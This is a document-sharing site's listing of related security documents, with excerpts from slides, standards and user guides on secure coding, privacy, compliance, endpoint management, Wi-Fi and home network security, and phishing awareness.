Protect Your Application with Secure Coding Practices. Barrie Dempster & Jason Foy JAM306 February 6, 2013 Protect Your Application with Secure Coding Practices Barrie Dempster & Jason Foy JAM306 February 6, 2013 BlackBerry Security Team Approximately 120 people work within the BlackBerry Security Team Security

More information

Physical and Environmental Security Standards

Physical and Environmental Security Standards Physical and Environmental Security Standards Table of Contents 1. SECURE AREAS... 2 1.1 PHYSICAL SECURITY PERIMETER... 2 1.2 PHYSICAL ENTRY CONTROLS... 3 1.3 SECURING OFFICES, ROOMS AND FACILITIES...

More information

The State of Privacy in Washington State. August 16, 2016 Alex Alben Chief Privacy Officer Washington

The State of Privacy in Washington State. August 16, 2016 Alex Alben Chief Privacy Officer Washington The State of Privacy in Washington State August 16, 2016 Alex Alben Chief Privacy Officer Washington I. The Global Privacy Environment Snowden Revelations of NSA surveillance International relations EU

More information

OA Cyber Security Plan FY 2018 (Abridged)

OA Cyber Security Plan FY 2018 (Abridged) OA Cyber Security Plan FY 2018 (Abridged) 1 Table of Contents Vision... 3 Goals, Strategies, and Tactics... 5 Goal #1: Create a Culture that Fosters the Adoption of Cyber Security Best Practices... 5 1.1

More information

Safety and Security. April 2015

Safety and Security. April 2015 Safety and Security April 2015 Protecting your smartphone and your data 2 Set a passcode on your smartphone For some smartphone models: 1. Go to Settings. 2. Tap ID & Passcode. 3. Set a 4-digit passcode.

More information

NIST Cybersecurity Framework Protect / Maintenance and Protective Technology

NIST Cybersecurity Framework Protect / Maintenance and Protective Technology NIST Cybersecurity Framework Protect / Maintenance and Protective Technology Presenter Charles Ritchie CISSP, CISA, CISM, GSEC, GCED, GSNA, +6 Information Security Officer IT experience spanning two centuries

More information

Cyber Security. February 13, 2018 (webinar) February 15, 2018 (in-person)

Cyber Security. February 13, 2018 (webinar) February 15, 2018 (in-person) Cyber Security Presenters: - Brian Everest, Chief Technology Officer, Starport Managed Services - Susan Pawelek, Accountant, Compliance and Registrant Regulation February 13, 2018 (webinar) February 15,

More information

Data Security and Privacy : Compliance to Stewardship. Jignesh Patel Solution Consultant,Oracle

Data Security and Privacy : Compliance to Stewardship. Jignesh Patel Solution Consultant,Oracle Data Security and Privacy : Compliance to Stewardship Jignesh Patel Solution Consultant,Oracle Agenda Connected Government Security Threats and Risks Defense In Depth Approach Summary Connected Government

More information

Comodo Endpoint Manager Software Version 6.25

Comodo Endpoint Manager Software Version 6.25 Comodo Endpoint Manager Software Version 6.25 End User Guide Guide Version 6.25.012219 Comodo Security Solutions 1255 Broad Street Clifton, NJ 07013 Table of Contents 1. Introduction to Endpoint Manager...3

More information

Comodo Endpoint Manager Software Version 6.26

Comodo Endpoint Manager Software Version 6.26 Comodo Endpoint Manager Software Version 6.26 End User Guide Guide Version 6.26.021819 Comodo Security Solutions 1255 Broad Street Clifton, NJ 07013 Table of Contents 1. Introduction to Endpoint Manager...3

More information

Cyber Security Guidelines for Public Wi-Fi Networks

Cyber Security Guidelines for Public Wi-Fi Networks Cyber Security Guidelines for Public Wi-Fi Networks Version: 1.0 Author: Cyber Security Policy and Standards Document Classification: PUBLIC Published Date: April 2018 Document History: Version Description

More information

Ensuring Desktop Central Compliance to Payment Card Industry (PCI) Data Security Standard

Ensuring Desktop Central Compliance to Payment Card Industry (PCI) Data Security Standard Ensuring Desktop Central Compliance to Payment Card Industry (PCI) Data Security Standard Introduction Manage Engine Desktop Central is part of ManageEngine family that represents entire IT infrastructure

More information

About The Presentation 11/3/2017. Hacker HiJinx-Human Ways to Steal Data. Who We Are? Ethical Hackers & Security Consultants

About The Presentation 11/3/2017. Hacker HiJinx-Human Ways to Steal Data. Who We Are? Ethical Hackers & Security Consultants November 3, 2017 Hacker HiJinx-Human Ways to Steal Data Who We Are? Ethical Hackers & Security Consultants Respond To Incidents & Breaches Perform Digital Forensic Investigations Data Mine Internet Intelligence

More information

SECURING YOUR HOME NETWORK

SECURING YOUR HOME NETWORK What is home network security? SECURING YOUR HOME NETWORK Home network security refers to the protection of a network that connects devices to each other and to the internet within a home. Whether it s

More information

KYOCERA Net Admin User Guide

KYOCERA Net Admin User Guide KYOCERA Net Admin User Guide Legal Notes Unauthorized reproduction of all or part of this guide is prohibited. The information in this guide is subject to change without notice. We cannot be held liable

More information

Webomania Solutions Pvt. Ltd. 2017

Webomania Solutions Pvt. Ltd. 2017 The other name for link manipulation is Phishing or you can say link manipulation is type of phishing attack done generally to mislead the user to a replica website or a looka-like of some well-known site.

More information